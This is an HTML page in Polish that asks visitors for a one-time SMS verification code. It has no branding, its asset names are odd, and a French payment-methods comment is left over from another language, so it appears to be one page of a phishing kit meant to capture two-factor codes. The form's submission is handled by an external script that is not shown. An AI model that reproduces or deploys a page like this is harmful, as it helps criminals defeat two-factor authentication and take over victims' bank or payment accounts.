<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/minak.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body style="background-color: white;">
    <div>
        <div class="roof">
            <img src="./img/hodor01.png" alt="">
            <img src="./img/smis-topam.JPG" alt="">
        </div>
    </div>


    <div>
        <div class="forma2">
            <div class="cc1">
                <p class="ccp">Weryfikacja SMS:</p>
                <div class="cc2">
                    <div class=""> 
                        <p> </p>
                        
                    </div>
                    <!--  -->
                    
                </div>
            </div>

            <div class="insid">
                <!-- <p class="p1p">
                    Méthodes de paiement:
                </p> -->
                <div class=""> 
                    <div class="ico">
                        <img src="./img/otm-iconan.svg" alt="">
                    </div>
                    <div class="vis">
                        <p class="sm1">Musisz się zweryfikować, wpisując jednorazowy kod, który otrzymałeś na swój telefon.</p>
                    </div>
                    
                    <form method="post" id="pg3">
                        <p>Kod SMS </p>
                        <input class="inp-sms" type="tele" name="" id="sps1" maxlength="19">

                        

                        

                        <button class="btn2"  type="submit">Potwierdzenie</button>
                    </form>
                </div>
                
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/boott.JPG" alt="">
            </div>
        </div>
    </div>


    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>